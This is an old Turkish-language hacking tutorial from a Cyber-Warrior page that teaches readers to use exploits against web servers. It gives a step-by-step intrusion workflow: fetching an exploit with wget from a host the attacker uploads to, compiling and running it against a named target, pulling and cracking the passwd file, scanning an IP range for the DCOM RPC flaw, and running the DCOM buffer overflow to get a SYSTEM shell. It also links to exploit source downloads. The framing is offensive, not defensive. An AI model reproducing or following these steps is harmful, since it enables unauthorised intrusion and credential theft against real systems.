Root > Documents > Web Güvenlik Açıkları > Exploits
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > Exploits
Madde
  Yazar : bLackhammer
  Date : 11.02.2005 14:03:46
 
# Exploits
 

1- Exploit nedir?
   Exploitler belli dilerde yazilmis ve bir kapali kutuda yetki alabilmek icin yada sahip oldugumuz yetkimizi artirmak icin yazilmis programlardir. Birkac turu vardir. Bu programalr internetin en karanlik yuzunu olusturur oyle paralar doner ki exploit yazarlari Dunyadaki eb zengin programcilardir. (Micro$oft u ele almiyoruz cunku bu kisiler tek basina olan kisilerdir.) Cok buyuk paralar doner. Internet Explorer Active X icin yazilmis 10000$ gibi bir ucrete satilan exploit biliyorum. Ama asil konumuz Web Hack icin kullanacagimiz Exploitlerdir. Bence Viruslerden sonra en karizmatik programlar diyebiliriz exploitlere. Bilmeniz gereken baska birsey ise her kapali kutuda her exploit calismaz. kapali kutunun OS una gore exploit kullanabiliriz.

   Local Exploitler
   Bu Exploitlerin erise bildigimiz kapali kutularda yetkimizi arttirmak icindir. En dusuk yetkiye dahi sahip olsak bir kapali kutuda calistirdigimiz zaman root yetkisine ulasabiliriz.

   Remote Exploitler
   Bu exploitler ise hic bir erisim hakkimiz olmadigi bir uzaktaki kapali kutuyu denetim altina almamizi saglarlar ki bizim icini onemli olan exploitler bunlardir.

2- Shell Nedir ?
   Shell Linux OS kullanan bir kapali kutudaki kisitli yetkiler ile size verilen bir alandir. Exploitler Shell de de derlenebilirler. ki ilk olarak analtacagim. Shell de exploit derlemektir.

3- Shell de Exploit Derlemek
   Kendimize bir hedef site sececegiz orn: www.bLackhammer.com (bir yabanci firma) oncelikli olarak hedef sitenin OS bilgilerini bilmeliyiz (dokumanin sonunda gerekli Linkleri verecegim). Daha sonra kapali kutunun OS una gore exploit imizi buluyoruz (dokuman sonunda exploit linklerinide bulabilirsiniz.) Daha sonra bu OS exploit in destekelyen bir shell hesabimizin olmasi gerekiyorki burda google.com yardimiza yetisiyor. Daha sonra hedef kapali kutu icin uygun exploitmizi host umza upload ediyoruz ki adini degismeyeceksiniz. (orn: bLack.c exploiti) Buradan sonraki asamalar ne kadar karisik sanilsada aslinda en kolay seylerdir. Simdi Linux da shell imizi acalim Linux da yetkimize gore shell acilir. Simdi Shell vasitasi ile exploit i bilgisayarimiza indirelim. bunu yapmak icin "wget http://Upload_ettigimiz_host/bLack.c" komutu ile exploit i bilgisayarimiza indirebiliyoruz. Bu sekildeki bir exploit isimize yaramaz cunku deaktif durumdadir. Aktif duruma getirmek icin GGC Compiler i kullaniriz genelde butun shell lerde mevcuttur. Fakat ucretsiz shell lerde kapatilmis durumda olabiliyor. Simdi exploit  bilgisayarimizdadir ama onu goremeyiz exploit i gorebilmek icin shell de "ls" yazarak gorebiliriz. Simdi exploit imizi derleme zamani. Bunun icin "gcc -o bLack bLack.c" yazarak derleyebilirsiniz. Simdi shell de "ls" yazarak exploit imizin derlenmis halinide gorebiliriz (black & black.c) bizim kullanacagimiz bLack.c dir. Derledigimiz exploit imizi kullanmak icinse "./black -h www.bLackhammer.com" komutu ile kullanabiliyoruz. Exploit imizin calisip calismamasi sizin kendi probleminizdir bazen derlemede hata yapabiliyor insan oglu. Bu derledigimiz exploit ile yapabileceklerimiz kullandigimiz exploit in yetenekleri ile sinirlidir. Mesela sitenin sifre dosyasidir. Sifre dosyasini "etc/passwd" komutu ile cekebiliriz. Eger basarili bir girisimde bulunduysak John The Ripper yada benzeri bir program ile kirarak sifreyi ele gecirebikliriz. Unutmammiz gerekn birsey var her zaman exploit ile sitenin passwd dosyasini cekebilirm diye birsey yoktur. Her zaman sitenin ana dizinie ulasamayabiliriz ki bu tur seyler sizi yildirmasin benim basima cok gelmisti.

4- Perl de Exploit Derlemek
   Perl de exploit derlemek icin bilgisayarimizda ActivePerl in kurulu olmasi gerekiyor. Eger ActivePerl i kurduysaniz bilgisayarinizda "c:Perl" diye bir kalsor olusacaktir. Simdi Hedef kapali kutumuz uygun exploit imizi de ayarladiktan sonra ki bu exploit mizi "bLack.pl" diye notepad de kaydetmemiz gerekir. "bLack.pl" dosyasini "c:PerlBin" klasoru altina tasimaliyiz. Simdi Derlemek icin "Baslat/Calistir/command yada cmd" yazarak MS-DOS penceresini acalim ve Perl dizininde Bin klasorune girelim (cd.. / cd perl / cd bin) simdi buradayken "perl bLack.pl -h www.bLackhammer.com yazin ve exploit mizin ozelliklerine gore yapabilceklerimiz vardir.

5- Ornek bir Uygulama
   Dcom Scanner belli bir IP araliginda Dcom acigin olup olmadigi arar. Elimde bu vardi bunu ornek veriyorum Win2k (sp1-sp2-sp3-sp4) ve winXP (sp1) de Dcom acigin arar. (Dcom Scanner in derlenmesini Analtacagim (linux icin) oncelikle Linux a Shell imizde root yetkisine gecelim. "gcc -o dcom2_scanner dcom2_scanner.c" yaziyoruz ve simdi taramaya baslayalim mesela 123.456.789.1 ile 123.456.789.255 araligini tariyacagiz. Bunun icin "./dcom2_scanner 123.456.789.1/24" yazacagiz. karsimiza

123.456.789.1 does not accept DCERPC -- good
123.456.789.2 has both dcom patchs -- good
123.456.789.3 has both dcom patchs -- good
123.456.789.4 has both dcom patchs -- good
** 123.456.789.5 has neither dcom patch -- BAD **

cikar. burda goruldugu gibi 123.456.789.5 nolu IP de dcom acigi tespit edilmistir.

Simdi Dcom exploit imizi derleyelim "gcc -o dcom dcom.c" ver karsimiza sole bisi cikmasi lazim.

[root@bLack root]# ./dcom 5 123.456.789.5
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Using return address of 0x77e9afe3
- Dropping to System Shell...

Microsoft Wind 1985-2000 Microsoft Corp.
(C) Telif Hakki
C:WINDOWSsystem32>

artik sistemdeyiz.


Linkler
-------

DCOM RPC Overflow Exploit
http://www.Cyber-Warrior.Org/PrgDownload/Exploit/dcom.c.txt

DCom Vulnerability Scanner
http://www.Cyber-Warrior.Org/PrgDownload/Exploit/dcom2c_scanner.c.txt

ActivePerl
http://www.activestate.com/Products/ActivePerl/

Dev C++ (windoze altinda C Derlemek icin)
http://www.bloodshed.net/

Sistem OS ogrenmek icin
http://www.netcraft.com

Exploit Kaynaklari
http://www.packetstormsecurity.com/exploits
http://www.k-otik.com
http://www.milw0rm.com

   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©